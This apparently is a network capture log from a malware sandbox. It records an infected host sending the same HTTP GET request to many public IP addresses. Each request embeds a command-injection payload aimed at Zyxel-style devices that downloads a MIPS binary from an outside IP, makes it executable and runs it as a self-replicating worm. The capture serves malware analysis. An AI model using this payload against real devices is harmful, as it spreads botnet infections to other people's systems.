                                      Jan 14, 2024 15:50:44.255598068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3718192.168.2.1439690165.187.243.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.255661964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3719192.168.2.1433018132.43.210.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.255711079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3720192.168.2.144116843.76.252.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.255764008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3721192.168.2.144275024.148.211.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.255803108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3722192.168.2.1460464222.99.95.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.255860090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3723192.168.2.144717834.122.18.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.255922079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3724192.168.2.144985813.157.178.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.255971909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3725192.168.2.146001027.52.128.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.256032944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3726192.168.2.1447432134.178.73.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.256084919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3727192.168.2.143955898.14.50.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.256140947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3728192.168.2.1447032133.178.163.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.256192923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3729192.168.2.146064857.178.145.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.256253004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3730192.168.2.1446770175.14.125.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.256293058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3731192.168.2.1434742159.160.69.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.256342888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3732192.168.2.1441026134.231.75.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.256370068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3733192.168.2.1433156122.54.206.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.256443977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3734192.168.2.143968038.208.137.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.256496906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3735192.168.2.145213051.32.110.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.256558895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3736192.168.2.1442766133.117.217.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.256624937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3737192.168.2.144080694.107.243.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.256663084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3738192.168.2.144931649.227.111.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.256720066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3739192.168.2.145245884.15.54.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.256773949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3740192.168.2.1434178198.5.247.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.256820917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3741192.168.2.1456798103.199.243.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.256870031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3742192.168.2.1453098172.76.178.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.256922960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3743192.168.2.1440688155.161.180.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.256982088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3744192.168.2.143635895.29.64.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.257006884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3745192.168.2.1454286129.144.173.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.257055998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3746192.168.2.1457314184.146.14.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.257113934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3747192.168.2.1433960152.0.29.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.257183075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3748192.168.2.143892231.148.99.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.257257938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3749192.168.2.1460082184.1.182.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.257323027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3750192.168.2.145806214.35.172.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.257390022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3751192.168.2.1437636157.215.193.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.257442951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3752192.168.2.1436608143.220.243.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.257493019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3753192.168.2.146070851.162.74.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.257569075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3754192.168.2.144445479.214.98.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.257612944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3755192.168.2.1452926186.35.209.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.257678032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3756192.168.2.1455774155.231.133.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.257734060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3757192.168.2.1435414199.193.43.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.257798910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3758192.168.2.1447660178.36.62.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.257848978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3759192.168.2.143440498.54.85.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.257891893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3760192.168.2.1443072171.201.167.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.257924080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3761192.168.2.144645036.255.179.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.257983923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3762192.168.2.143765861.151.29.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.258039951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3763192.168.2.1438926148.169.4.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.258105993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3764192.168.2.144934859.228.144.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.258138895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3765192.168.2.144465439.200.236.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.258199930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3766192.168.2.1455248126.133.148.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.258261919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3767192.168.2.1440802112.2.35.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.258337021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3768192.168.2.1436428203.137.64.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.258392096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3769192.168.2.1442656194.121.208.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.258450985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3770192.168.2.1442856187.99.190.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.258507967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3771192.168.2.145422825.24.150.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.258532047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3772192.168.2.1441718107.215.148.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.258603096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3773192.168.2.143745468.233.241.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.258675098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3774192.168.2.144251074.119.247.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.258704901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3775192.168.2.1449208207.72.100.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.258764982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3776192.168.2.1457280122.5.132.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.258822918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3777192.168.2.1438248107.32.111.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.258862972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3778192.168.2.1442690123.83.179.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.258925915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3779192.168.2.1458216219.32.26.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.259000063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3780192.168.2.1435274180.208.181.96443
                                      TimestampBytes transferredDirectionData
